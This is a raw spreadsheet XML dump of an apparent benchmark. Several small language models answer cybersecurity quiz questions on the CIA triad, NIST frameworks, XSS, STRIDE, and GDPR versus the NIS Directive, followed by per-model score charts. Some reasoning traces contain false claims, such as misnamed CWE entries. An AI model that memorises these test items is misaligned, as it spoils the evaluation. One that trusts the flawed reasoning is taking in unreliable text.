I need to make sure I'm not mixing up the terms. Essential services are about operational stability, while personal data is about the right to privacy. The answer should clearly state which regulation applies to each incident based on the clue provided.
&lt;/think&gt;
**Incident 1 (Power grid disruption):**  
Primarily concerns **regulations governing the operational stability of essential services** (EU's essential services regulations), as the power grid is a critical infrastructure component.  
**Incident 2 (Social media data breach):**  
Primarily concerns **regulations protecting personal data** (EU's General Data Protection Regulation, GDPR), as the breach involves the exposure of individuals' personal messages, violating their right to privacy.  
The distinction lies in whether the incident impacts *essential services* (societal necessity) or *personal data* (fundamental right).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The question is about which principle of the CIA triad a cloud storage service using checksums like SHA-256 is upholding. The CIA triad stands for Confidentiality, Integrity, and Availability.
The clue mentions that checksums are used to detect changes, which relates to integrity. Since the service is ensuring that files haven't been altered, that's about maintaining the integrity of the data. Confidentiality would be about keeping data secret, which isn't mentioned here. Availability is about ensuring access, which isn't directly addressed in the clue either. So the primary principle here is Integrity.
&lt;/think&gt;
The principle being upheld is **Integrity**. Checksums ensure that data remains unaltered and accurate, preventing unauthorized changes or corruption.</t>
  </si>
  <si>
    <t>qwen3:4b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the type of statement and its purpose based on the given clue. The clue mentions that abstract security goals are broken down into specific, actionable statements. The example given is "The system must enforce MFA for all administrative access."
First, I need to determine what type of statement this is. The clue talks about breaking down abstract goals into specific, actionable statements. So, this example is likely a security requirement. Security requirements are specific, actionable statements that guide development and testing. 
Now, the primary purpose. MFA is a security measure to prevent unauthorized access. Enforcing it for administrative access ensures that only authorized users can access critical systems. The purpose is to strengthen access control and reduce the risk of unauthorized access. 
Wait, the clue says that these statements guide development and testing. So the purpose is to ensure that the system meets security goals by making it clear what needs to be implemented. So the primary purpose is to enforce strong access control mechanisms, specifically MFA, to protect administrative access. 
I should check if there's a specific term for this. In cybersecurity, such statements are often called security requirements or security controls. But the question asks for the type of statement. The clue says they are specific, actionable statements that guide development and testing. So the answer is security requirement. The primary purpose is to enforce access control and prevent unauthorized access.
&lt;/think&gt;
The statement is a **security requirement**. Its primary purpose is to enforce **strong access control** by ensuring that administrative access is protected through multi-factor authentication, thereby reducing the risk of unauthorized access or credential-based attacks.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the NIST CSF functions that are demonstrated when a company deals with a ransomware attack by activating their incident response plan to contain the damage and restore systems from backups.
First, I need to recall the NIST CSF framework. The CSF is organized into functions, which are grouped into categories like Identify, Protect, Detect, Respond, and Recover. The question mentions two functions related to actions during an incident and after. 
The clue says that two functions deal with actions during the incident (containment) and after (returning to normal operations). The functions in the NIST CSF that are related to responding to incidents and recovering from them are "Respond" and "Recover". 
The "Respond" function includes activities like containing the incident, mitigating impacts, and making decisions about further actions. The "Recover" function focuses on restoring systems and services to normal operations. 
So, when the company activates their incident response plan to contain the damage, that's part of the Respond function. Restoring systems from backups is part of the Recover function. Therefore, the two core functions are Respond and Recover.
&lt;/think&gt;
The two core functions demonstrated are **Respond** and **Recover**.  
- **Respond** addresses actions during the incident (e.g., containing damage, mitigating impact).  
- **Recover** focuses on restoring systems and returning to normal operations (e.g., restoring from backups).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a specific control family in NIST SP 800-53 that addresses recording actions by privileged users in immutable, time-stamped logs.
First, I remember that NIST 800-53 has different control families. The clue mentioned that non-repudiation is a fundamental principle, and that a specific family of controls is dedicated to establishing traceability through system logs. The question is about logging actions by privileged users, which relates to audit and log management.
Looking at the NIST 800-53 control families, there's a section called "Audit and Accountability" (AU). This family deals with ensuring that user actions are logged and can be traced. The specific controls under AU would include requirements for logging, ensuring logs are immutable, and time-stamping. 
The clue also mentions that NIST 800-53 has a family of controls for traceability through system logs. The answer should be the Audit and Accountability family. Let me double-check. Yes, AU is the correct family. Controls like AU-1, AU-2, etc., focus on logging and maintaining audit trails. So the answer is AU, Audit and Accountability.
&lt;/think&gt;
The control family in NIST SP 800-53 that addresses this requirement is **AU (Audit and Accountability)**. This family ensures traceability of user actions through immutable, time-stamped logs, aligning with non-repudiation principles.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's break this down. The user is asking about a web application vulnerability where a comment section is directly rendered without sanitization. The attacker uses a script tag to steal cookies.
First, I remember that injection vulnerabilities involve user input being used in a way that can execute unintended code. The clue mentions client-side scripts in the context of web pages. The example given is a script tag that redirects the user and steals cookies. That sounds like a cross-site scripting (XSS) attack. 
CWE identifiers are standardized. I think XSS is CWE-79. Let me confirm. Yes, CWE-79 is Cross-Site Scripting. The key here is that the application didn't sanitize user input, allowing the script to run in the browser. So the answer should be XSS and CWE-79.
&lt;/think&gt;
The vulnerability is **Cross-Site Scripting (XSS)**, and its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a threat in the STRIDE model that involves an unauthorized user intercepting and altering data packets, changing a financial transaction. The clue mentioned that the Integrity principle is about ensuring data isn't modified unauthorizedly, and STRIDE has a category for that.
First, I need to recall the STRIDE model. STRIDE stands for several categories: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Wait, but maybe I should check again. Oh right, STRIDE is a framework for threat modeling, and the categories are: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Wait, no, actually, the STRIDE model includes: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. But sometimes people might refer to it as six categories. However, the key here is the threat that violates the Integrity principle. 
The question is about data being intercepted and altered. So that's modifying data in transit. Tampering in STRIDE is about modifying data, so that's the category. The example given is changing the amount of a financial transaction, which is a classic case of data tampering. So the answer should be "Tampering".
&lt;/think&gt;
The threat described belongs to the **Tampering** category in the STRIDE threat model. This category addresses unauthorized modification of data during transmission, which directly violates the **Integrity** principle of information security.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two different security incidents in the EU and which regulation applies to each. The clue mentions that EU regulations distinguish between protecting personal data (a fundamental right) and ensuring the operational stability of essential services (a societal necessity). 
First, I need to recall which regulations are relevant here. The General Data Protection Regulation (GDPR) is the main law for personal data protection. Then there's the NIS Directive (Network and Information Security Directive) which focuses on essential services and operational stability.
For incident 1: A nationwide power grid operator's cyberattack disrupting electricity distribution. Power grids are essential services, right? So the NIS Directive would apply here because it's about maintaining the stability of critical infrastructure. The NIS Directive requires operators of essential services to have robust security measures and to report incidents that could affect the stability of the essential service.
For incident 2: A social media company's data breach exposing personal messages. Personal data is involved here, so the GDPR would be the primary concern. GDPR requires companies to protect personal data and report breaches, especially if they affect users' rights.
Wait, but the question is about which regulation is the primary concern. The NIS Directive is for essential services, and GDPR is for personal data. So yes, incident 1 is NIS, incident 2 is GDPR. That makes sense. I should make sure there's no overlap or other regulations, but I think that's the main point.
&lt;/think&gt;
- **Incident 1 (Power grid disruption):** Primary concern is the **NIS Directive** (Network and Information Security Directive), which safeguards operational stability of essential services.  
- **Incident 2 (Data breach exposing personal messages):** Primary concern is the **GDPR** (General Data Protection Regulation), which protects citizens' personal data as a fundamental right.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the CIA triad and which principle is being upheld when a cloud storage service uses data checksums like SHA-256 hashes. Let me think.
First, the CIA triad stands for Confidentiality, Integrity, and Availability. The question is about data checksums used to verify files haven't been altered or corrupted. Checksums are used to ensure data integrity, right? Because they detect changes to the data. If the checksum doesn't match, it means the data has been altered. So that's about ensuring the data is correct and hasn't been tampered with. 
Wait, but the clue mentioned that hashes are for a digital fingerprint to detect changes. So that's definitely integrity. The other principles are confidentiality (keeping data secret) and availability (making sure data is accessible). But checksums don't hide data, so confidentiality isn't the one here. Availability is about the data being available when needed, which isn't directly related to checksums. So the answer should be integrity.
&lt;/think&gt;
The principle of the CIA triad being upheld is **Integrity**. Checksums (like SHA-256) ensure data remains unaltered during transmission or storage, verifying the authenticity and consistency of the data.</t>
  </si>
  <si>
    <t>qwen3:8b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let me try to figure this out. The user is asking about a statement related to cybersecurity and what type of statement it is, along with its primary purpose.
First, the clue provided says that in system design, abstract security goals are broken down into specific, actionable statements. So, the question is about categorizing the given statement. The example given is "The system must enforce multi-factor authentication (MFA) for all administrative access." 
I remember that in cybersecurity, there are different types of statements or requirements. There's the difference between a security policy, a security control, and maybe a specific requirement. Let me think. Security policies are more about the rules and guidelines, like what is allowed or prohibited. Security controls are the specific measures taken to mitigate risks. 
The statement here is very specific. It's not just a policy statement; it's a concrete action. Enforcing MFA is a technical control. So, this would be a security control. The primary purpose is to ensure that administrative access is protected by requiring MFA, which reduces the risk of unauthorized access. 
Wait, but maybe it's a requirement. But the clue mentions breaking down abstract goals into actionable statements. So the statement is a specific actionable item. In cybersecurity, these are often called security controls or requirements. But I think the more precise term here is a security control. 
Alternatively, maybe it's a security requirement. Let me check. Security requirements are part of the system design, specifying what needs to be implemented. The clue mentions that abstract goals are broken into specific statements, which are then used in development and testing. So the statement is a security requirement. 
But sometimes, security controls are the specific measures. For example, MFA is a control. So the statement is a requirement that enforces a control. The primary purpose is to enforce a security measure to protect against unauthorized access. 
Hmm. The question is asking for the type of statement and its primary purpose. The statement is a security control. The primary purpose is to enforce MFA as a safeguard against unauthorized access. Alternatively, maybe it's a security requirement. 
Wait, the clue says "specific, actionable statements that guide development and testing." So these are requirements. Therefore, the statement is a security requirement. The purpose is to ensure that MFA is implemented for administrative access. 
But I think in cybersecurity terminology, this is more accurately referred to as a security control. Because a security control is a specific measure taken to manage risk. So the statement is a security control. The primary purpose is to mitigate the risk of unauthorized access by requiring MFA. 
I need to confirm. Security requirements are part of the system's design, specifying what must be done. Security controls are the actual mechanisms. So the statement is a security requirement. But maybe the answer is that it's a specific security control. 
Alternatively, maybe it's a security policy. No, because policies are more general. The statement is very specific. So, the answer is that it's a security control, and its purpose is to enforce M'tfa to protect administrative access. 
I think the answer is that it's a security control, and the purpose is to enforce MFA as a safeguard against unauthorized access. But I need to make sure. Let me think again. 
The clue says that abstract goals are broken into specific statements. These statements are actionable. So, in the context of cybersecurity, these are security requirements. For example, a requirement that the system must enforce MFA. Therefore, the type is a security requirement, and the purpose is to ensure that MFA is implemented to protect administrative access. 
Alternatively, the term "security control" is broader. So the statement is an example of a security control. 
I think both terms can be correct, but the more precise answer based on the clue is that it's a specific, actionable statement, which would be a security requirement. However, in practice, it's often referred to as a security control. 
But the question is about the type of statement. The clue mentions that these are specific statements that guide development and testing. So, in systems design, these are requirements. Therefore, the answer is that it's a security requirement, and its purpose is to enforce MFA to protect administrative access. 
Wait, but the question is in the context of cybersecurity. So maybe the answer is that it's a security control. Let me check some references. 
In cybersecurity, security controls are the specific measures taken to manage risk. So the statement is a security control. The primary purpose is to mitigate the risk of unauthorized access by requiring MFA. 
Yes, that makes sense. So the answer is that the statement is a security control, and its primary purpose is to enforce MFA to protect administrative access from unauthorized users.
&lt;/think&gt;
The statement is a **security control**. Its primary purpose is to **enforce multi-factor authentication (MFA)** for administrative access, thereby mitigating the risk of unauthorized access and enhancing system security.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the NIST CSF functions related to a ransomware attack scenario. The clue mentions that two functions deal with actions during an incident to contain it and actions after to return to normal.
First, I need to recall the NIST CSF's core functions. The framework has five functions: Identify, Protect, Detect, Respond, and Recover. 
The question is about actions during an incident (containment) and after (restoring systems). The clue says two functions are specifically for these actions. 
During an incident, the Respond function is about taking actions to contain the incident. That makes sense because responding includes things like containing the threat, mitigating impact. Then, after the incident, the Recover function is about restoring operations and returning to normal. So the two functions would be Respond and Recover. 
Wait, let me double-check. The Detect function is about identifying the incident, but the question is about actions taken during and after. So yes, Respond (during) and Recover (after). The answer should be Respond and Recover.
&lt;/think&gt;
The two core functions demonstrated are **Respond** (for containing the incident during the attack) and **Recover** (for restoring systems and returning to normal operations after the incident).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the NIST SP 800-53 control family that addresses the requirement for recording privileged user actions in immutable, time-stamped logs.
First, I remember that the clue mentioned non-repudiation and the NIST 800-53 family of controls related to system logs. Non-repudiation is about ensuring actions can't be denied, which ties into accountability and logging.
The question specifically mentions immutable and time-stamped logs for privileged users. In NIST 800-53, there's a control family focused on audit and accountability. The key here is that the logs need to be tamper-proof, which aligns with controls that ensure the integrity and immutability of logs.
Looking at the control families in 800-53, the "Audit and Accountability" family (AU) deals with logging and monitoring user activities. Controls like AU-2, AU-3, and AU-6 are about maintaining logs, ensuring they are protected, and making sure they can't be altered. The immutability would fall under protecting the logs from unauthorized changes, which is part of the audit controls.
So the answer should be the Audit and Accountability (AU) control family. That makes sense because it's about tracking and recording user actions, ensuring they can't be repudiated, and maintaining log integrity.
&lt;/think&gt;
The control family that addresses this requirement in NIST SP 800-53 is **Audit and Accountability (AU)**. This family includes controls ensuring logs are immutable, time-stamped, and protected to prevent tampering, directly supporting non-repudiation and accountability for privileged actions.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a web application vulnerability where user input is directly rendered without sanitization, leading to an attacker injecting a script. The example given is a comment with a script tag that steals cookies.
First, I remember that when user input is directly executed or rendered without proper checks, it's a common security issue. The clue mentions injection vulnerabilities, specifically mentioning client-side scripts. The example here uses a script tag, which makes me think of Cross-Site Scripting (XSS). 
XSS occurs when an attacker injects malicious scripts into web pages viewed by other users. The scenario described fits XSS because the user input is directly rendered, allowing the script to execute in the browser of other users. 
Now, the CWE identifier. I recall that CWE (Common Weakness Enumerations) has specific IDs for different vulnerabilities. For XSS, the corresponding CWE is CWE-79. Let me double-check that. Yes, CWE-79 is titled "Incorrect Canonicalization," but wait, that might not be right. Wait, no—CWE-79 is actually about improper validation of input, but the specific XSS entry is CWE-79. Wait, maybe I'm mixing up. Let me think again. 
Actually, the correct CWE for XSS is CWE-79, which is "Incorrect Canonicization (Improper Neutralization of Input During Canonicalization)". However, sometimes people refer to XSS as CWE-79, but I need to confirm. Alternatively, maybe it's CWE-103? No, CWE-103 is about command injection. Wait, the clue mentions injection vulnerabilities, but in this case, it's client-side, so it's XSS. 
Yes, the correct CWE identifier for XSS is CWE-79. So the answer should be Cross-Site Scripting (XSS) and CWE-79.
&lt;/think&gt;
The vulnerability is **Cross-Site Scripting (XSS)**, and its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the STRIDE model and which category a specific threat falls into. The scenario is about unauthorized interception and alteration of data packets, changing a financial transaction amount. 
First, I need to recall what STRIDE stands for. STRIDE is a threat modeling framework that categorizes threats into six categories: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. 
The clue given mentions that the 'Integrity' principle is about ensuring data isn't modified without authorization. The STRIDE category that directly relates to this is Tampering. Tampering involves unauthorized modification of data, which matches the scenario where data packets are altered. 
Wait, let me make sure. The question mentions interception and alteration. Spoofing is about impersonation, so that's not it. Tampering is about altering data, which fits here. The financial transaction being changed is a clear example of data integrity being violated. So the answer should be Tampering.
&lt;/think&gt;
The threat described falls under the **Tampering** category in the STRIDE model. This category directly addresses unauthorized modification of data, which violates the integrity principle by altering data packets in transit.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two security incidents in the EU and which regulations apply to each. The clue mentions EU regulations distinguishing between personal data and essential services.
First, the first incident is a power grid operator being attacked, disrupting electricity. Essential services are mentioned as societal necessities. The clue says different rules apply based on whether personal data or essential services are impacted. So, if the attack affects essential services, that's one regulation. 
The second incident is a data breach at a social media company exposing personal messages. Personal data is a fundamental right here. The clue says personal data is one category, so that would fall under the other regulation.
Wait, the EU has GDPR for personal data, right? And for essential services, there's the NIS Directive, which is about maintaining cybersecurity for critical infrastructure. So the power grid is part of essential services, so NIS Directive applies. The data breach would be under GDPR. 
Let me make sure. The clue says EU regulations make a key distinction between personal data (GDPR) and essential services (NIS Directive). So incident 1 is NIS Directive, incident 2 is GDPR. That's the answer.
&lt;/think&gt;
Incident 1 (power grid disruption) is primarily governed by the **NIS Directive** (regulating essential services and cybersecurity for critical infrastructure). Incident 2 (data breach of personal messages) falls under the **GDPR** (General Data Protection Regulation), which safeguards personal data as a fundamental right.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the CIA triad principle related to using checksums like SHA-256 in a cloud storage service. The clue mentions that cryptographic hashes and checksums provide a digital fingerprint to detect changes, both accidental or malicious.
First, I need to recall the CIA triad: Confidentiality, Integrity, and Availability. The question is about which principle is being upheld by using checksums. 
Confidentiality is about keeping data private, which encryption handles. Since checksums don't hide data, that's not it. 
Integrity is about ensuring data hasn't been altered. The clue says checksums detect changes, which directly relates to integrity. 
Availability is about ensuring data is accessible when needed. Checksums don't really affect availability. 
So the answer should be Integrity. The service uses checksums to verify data hasn't been changed, maintaining integrity. Let me double-check. Yes, the clue emphasizes detecting alterations, which is part of integrity. That makes sense.
&lt;/think&gt;
The principle of the CIA triad primarily upheld by using data checksums (like SHA-256) is **Integrity**. Checksums ensure data remains unaltered and detect any accidental or malicious changes during transmission or storage.</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Correct %</t>
  </si>
  <si>
    <t>Incomplete</t>
  </si>
  <si>
    <t>Incorrect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</si>
</sst>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rgb="FFFFFFFF"/>
      <name val="Calibri"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4F81BD"/>
        <bgColor rgb="FF4F81BD"/>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wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="48">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
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFEB9C"/>
          <bgColor rgb="FFFFEB9C"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>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en-US"/>
              <a:t>Total Score by Model</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="1"/>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:cat>
            <c:strRef>
              <c:f>Summary!$A$2:$A$25</c:f>
              <c:strCache>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>deepseek-r1:1.5b</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>deepseek-r1:7b</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>gemma3:1b</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>gemma3:4b</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>gemma3n:e2b</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>granite3-dense:2b</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>granite3-dense:8b</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>granite3.2:2b</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>granite3.2:8b</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>llama3.2:1b</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>llama3.2:3b</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>llama3:8b</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>mistral:7b</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>phi3:3.8b</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>phi4-mini-reasoning:3.8b</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>phi4-mini:3.8b</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>qwen2.5:0.5b</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>qwen2.5:1.5b</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>qwen2.5:3b</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>qwen2.5:7b</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>qwen3:0.6b</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>qwen3:1.7b</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>qwen3:4b</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>qwen3:8b</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Summary!$I$2:$I$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>14</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5807-40DB-9802-9CCFCA32517D}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="10"/>
        <c:axId val="100"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="10"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="r"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Total Score</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>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en-US"/>
                  <a:t>Model</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="10"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>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1"/>
  <c:style val="11"/>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Evaluation Distribution by Model</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="1"/>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="stacked"/>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Correct</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="C6EFCE"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$K$2:$K$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>7</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0-F59A-4D99-8385-D208E151890A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Incomplete</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFEB9C"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$L$2:$L$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>3</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1-F59A-4D99-8385-D208E151890A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>Incorrect</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
